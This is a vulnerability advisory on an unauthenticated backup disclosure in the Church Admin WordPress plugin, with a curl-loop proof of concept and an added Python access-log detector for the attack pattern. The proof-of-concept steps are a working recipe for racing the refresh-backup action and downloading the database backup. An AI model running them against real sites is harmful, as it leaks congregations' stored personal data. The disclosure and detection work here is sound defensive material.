Church Admin < 3.4.135 - Unauthenticated Plugin's Backup Disclosure

WPEX-ID: B2C7C1E8-D72C-4B1E-B5CB-DC2A6538965D
Published: Mar 07, 2022
Author: cydave

Tags: church admin, unauthenticated, plugin, backup disclosure, terminal, curl, fetch, filename, download, exploit

EPSS: 0.001 (percentile 39.5%)

The plugin lacks authorisation and CSRF checks in some of its actions as well as on the files it serves. This allows unauthenticated attackers to repeatedly request the "refresh-backup" action while simultaneously polling a publicly accessible temporary file generated by the plugin, which discloses the final backup filename; the attacker can then fetch that file to download the backup of the plugin's DB data.

1. In one terminal, continuously fetch from http://127.0.0.1:8080/?action=refresh-backup:

while true; do curl -s 'http://127.0.0.1:8080/?action=refresh-backup' >/dev/null; done

2. In a second terminal, continuously fetch from /wp-content/uploads/church-admin-cache/temp.sql:

while true; do curl -s http://127.0.0.1:8080/wp-content/uploads/church-admin-cache/temp.sql | grep '\.sql\.gz'; done

3. After a while, the curl | grep command in the second terminal should print the backup filename. Once it does, abort the command in terminal one first, then the one in the second terminal, and use the last output of the second terminal as the filename (<md5-hash>.sql.gz).

4. Download the backup by accessing it via http://127.0.0.1:8080/wp-content/uploads/church-admin-cache/<extracted-md5-hash>.sql.gz
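From the defender's side, the traffic pattern described above is distinctive: one client repeatedly hitting ?action=refresh-backup, polling temp.sql in the church-admin-cache directory at the same time, and finally fetching a .sql.gz file from that directory. The following detection script is an added example and is not part of this WPScan entry, cydave's PoC, or the Church Admin plugin. It assumes access logs in Apache/nginx combined format; the thresholds, time window, client IPs (documentation ranges) and the 32-hex backup filename in the sample log are constructed for the example.

```python
"""Flag clients whose access-log traffic matches the Church Admin backup-disclosure pattern.

Added example, not code from the WPScan entry or the plugin. Assumes combined log
format; thresholds and sample data are constructed for illustration.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Combined log format: ip ident user [time] "METHOD path HTTP/x" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Paths taken from the advisory: the action that triggers a backup and the cache dir it writes to.
CACHE_DIR = "/wp-content/uploads/church-admin-cache/"
BACKUP_RE = re.compile(r"\.sql\.gz$")


def parse_line(line):
    """Parse one combined-format log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m.group("ip"),
        "ts": datetime.strptime(m.group("ts"), TS_FMT),
        "path": m.group("path"),
        "status": int(m.group("status")),
    }


def classify(path):
    """Map a request path to an indicator: 'refresh', 'temp', 'backup', or None."""
    if "action=refresh-backup" in path:
        return "refresh"
    if path.startswith(CACHE_DIR + "temp.sql"):
        return "temp"
    if path.startswith(CACHE_DIR) and BACKUP_RE.search(path.split("?")[0]):
        return "backup"
    return None


def detect(lines, window=timedelta(seconds=60), min_refresh=5, min_temp=5):
    """Return one alert per client that polls refresh-backup and temp.sql together.

    A client is flagged when it sends at least `min_refresh` refresh-backup requests
    and `min_temp` temp.sql requests with at least one pair inside `window` of each
    other (thresholds are assumptions). A successful .sql.gz fetch from the cache
    directory by the same client is recorded as a confirmed download.
    """
    per_ip = defaultdict(lambda: {"refresh": [], "temp": [], "backup": []})
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        kind = classify(rec["path"])
        if kind:
            per_ip[rec["ip"]][kind].append(rec)

    alerts = []
    for ip, ev in per_ip.items():
        refresh, temp, backup = ev["refresh"], ev["temp"], ev["backup"]
        if len(refresh) < min_refresh or len(temp) < min_temp:
            continue
        # Require the two polling loops to actually overlap in time.
        concurrent = any(abs(r["ts"] - t["ts"]) <= window for r in refresh for t in temp)
        if not concurrent:
            continue
        downloaded = [b["path"] for b in backup if b["status"] == 200]
        alerts.append({
            "ip": ip,
            "refresh_requests": len(refresh),
            "temp_polls": len(temp),
            "backup_downloaded": bool(downloaded),
            "backup_files": downloaded,
        })
    return alerts


def _line(ip, sec, path, status):
    """Build a constructed combined-format log line at 10:00:<sec> on 07/Mar/2022."""
    return f'{ip} - - [07/Mar/2022:10:00:{sec:02d} +0000] "GET {path} HTTP/1.1" {status} 512 "-" "curl/7.81"'


# Constructed sample log: 203.0.113.7 runs both loops then fetches the backup;
# 198.51.100.5 is a legitimate user who triggers a single refresh.
SAMPLE_LOG = (
    [_line("203.0.113.7", s, "/?action=refresh-backup", 200) for s in range(0, 12, 2)]
    + [_line("203.0.113.7", s, CACHE_DIR + "temp.sql", 200) for s in range(1, 12, 2)]
    + [_line("203.0.113.7", 15, CACHE_DIR + "0123456789abcdef0123456789abcdef.sql.gz", 200)]
    + [_line("198.51.100.5", 3, "/wp-login.php", 200),
       _line("198.51.100.5", 20, "/?action=refresh-backup", 200)]
)

if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```

Run against real logs, feed `detect()` the lines of the access log instead of SAMPLE_LOG; an alert with `backup_downloaded` set to True means the client did obtain a .sql.gz from the cache directory and the DB export should be treated as disclosed. The same indicator paths are what a web server or WAF rule would deny for unauthenticated clients while the plugin remains below 3.4.135.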
